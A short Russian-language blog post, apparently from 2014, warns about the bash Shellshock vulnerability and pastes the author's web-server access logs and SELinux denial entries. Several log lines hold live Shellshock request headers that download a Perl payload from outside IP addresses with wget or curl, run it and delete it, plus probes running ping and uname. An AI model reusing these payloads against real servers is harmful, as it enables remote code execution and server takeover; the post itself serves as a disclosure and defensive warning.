Всем привет Для тех, кто не в курсе - опасная удалённая уязвимость в bash, эксплуатируется через всё на свете./var/log/httpd/access_log:146.71.113.194 - - [29/Sep/2014:05:45:42 +0600] "GET /cgi-bin/helpme HTTP/1.0" 404 212 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat*;rm -rf /tmp/jurat\"" /var/log/httpd/access_log-20140928:209.126.230.72 - - [25/Sep/2014:08:23:10 +0600] "GET / HTTP/1.0" 200 775 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" /var/log/httpd/access_log-20140928:70.42.149.68 - - [27/Sep/2014:03:42:09 +0600] "GET /test HTTP/1.0" 404 202 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" /var/log/httpd/access_log-20140928:70.42.149.68 - - [27/Sep/2014:03:42:09 +0600] "GET / HTTP/1.0" 200 775 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" /var/log/httpd/access_log-20140928:70.42.149.68 - - [27/Sep/2014:03:42:09 +0600] "GET /cgi-bin/test.sh HTTP/1.0" 404 213 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" /var/log/httpd/access_log-20140928:54.251.83.67 - - [27/Sep/2014:19:43:52 +0600] "GET / HTTP/1.1" 200 775 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a" /var/log/httpd/access_log-20140928:173.45.100.18 - - [28/Sep/2014:01:31:23 +0600] "GET /cgi-bin/hi HTTP/1.0" 404 208 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\"" /var/log/nginx/access.log:146.71.113.194 - - [29/Sep/2014:05:45:43 +0600] "GET /cgi-bin/helpme HTTP/1.0" 404 5506 "-" "() { :;}; /bin/bash -c \x22cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat*;rm -rf /tmp/jurat\x22" "-" type=AVC msg=audit(1412010002.438:57): avc: denied { search } for pid=1599 comm="PassengerHelper" name="tmp" dev=dm-0 ino=3215 scontext=system_u:system_r:httpd_passenger_helper_t:s0 tcontext=system_u:object_r:httpd_tmpfs_t:s0 tclass=dir type=AVC msg=audit(1412010002.439:58): avc: denied { search } for pid=1599 comm="PassengerHelper" name="tmp" dev=dm-0 ino=3215 scontext=system_u:system_r:httpd_passenger_helper_t:s0 tcontext=system_u:object_r:httpd_tmpfs_t:s0 tclass=dir type=AVC msg=audit(1412010301.563:82): avc: denied { search } for pid=1693 comm="PassengerHelper" name="tmp" dev=dm-0 ino=3215 scontext=system_u:system_r:httpd_passenger_helper_t:s0 tcontext=system_u:object_r:httpd_tmpfs_t:s0 tclass=dir type=AVC msg=audit(1412010301.563:83): avc: denied { search } for pid=1693 comm="PassengerHelper" name="tmp" dev=dm-0 ino=3215 scontext=system_u:system_r:httpd_passenger_helper_t:s0 tcontext=system_u:object_r:httpd_tmpfs_t:s0 tclass=dir type=AVC msg=audit(1412010601.978:96): avc: denied { search } for pid=1768 comm="PassengerHelper" name="tmp" dev=dm-0 ino=3215 scontext=system_u:system_r:httpd_passenger_helper_t:s0 tcontext=system_u:object_r:httpd_tmpfs_t:s0 tclass=dir type=AVC msg=audit(1412010601.978:97): avc: denied { search } for pid=1768 comm="PassengerHelper" name="tmp" dev=dm-0 ino=3215 scontext=system_u:system_r:httpd_passenger_helper_t:s0 tcontext=system_u:object_r:httpd_tmpfs_t:s0 tclass=dir |
Блог >